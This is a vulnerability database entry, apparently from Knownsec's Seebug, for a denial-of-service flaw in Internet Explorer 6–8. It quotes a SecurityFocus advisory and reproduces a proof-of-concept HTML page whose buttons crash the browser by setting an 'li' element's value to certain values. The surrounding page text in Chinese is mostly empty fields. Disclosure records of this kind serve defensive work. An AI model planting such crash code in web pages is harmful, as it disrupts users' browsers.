Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (1)

基本字段

漏洞编号：: SSV-86417

披露/发现时间：: 未知

提交时间：: 2014-07-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.15KB

source: http://www.securityfocus.com/bid/36070/info Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability. Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to corrupt process memory and run arbitrary code, but this has not been confirmed. Versions prior to Internet Explorer 8 beta 2 are vulnerable. <html> <head> <title>IE Crash Example</title> </head> <body> <button type="button" onclick="document.createElement('li').value = null;">null - Okay</button> <button type="button" onclick="document.createElement('li').value = 0;">0 - Okay</button> <button type="button" onclick="document.createElement('li').value = 1;">1 - Crash</button> <button type="button" onclick="document.createElement('li').value = '1';">'1' - Crash</button> <button type="button" onclick="document.createElement('li').value = true;">true - Crash</button> <button type="button" onclick="document.createElement('li').value = 'true';">'true' - Okay</button> <button type="button" onclick="document.createElement('li').value = false;">false - Okay</button> <button type="button" onclick="document.createElement('li').value = [];">[] - Okay</button> <button type="button" onclick="document.createElement('li').value = [1];">[1] - Crash</button> <button type="button" onclick="document.createElement('li').value = ['1'];">['1'] - Crash</button> <button type="button" onclick="document.createElement('li').value = ['true'];">['true'] - Okay</button> <button type="button" onclick="document.createElement('li').value = {};">{} - Okay</button> <button type="button" onclick="document.createElement('li').value = {count:1};">{count:1} - Okay</button> <button type="button" onclick="document.createElement('li').value = undefined;">undefined - Okay</button> <button type="button" onclick="document.createElement('li').value = function(){};">function(){} - Okay</button> </body> </html>

共 3 兑换

参考链接

http://www.exploit-db.com/exploits/33173

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC
匿名兑换PoC
匿名兑换PoC

生命线

发现/披露了漏洞
2014-07-01 提交了漏洞
2014-07-01 提交补充了漏洞详情
2014-07-01 提交更新了 PoC

Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (1)

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (1)

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定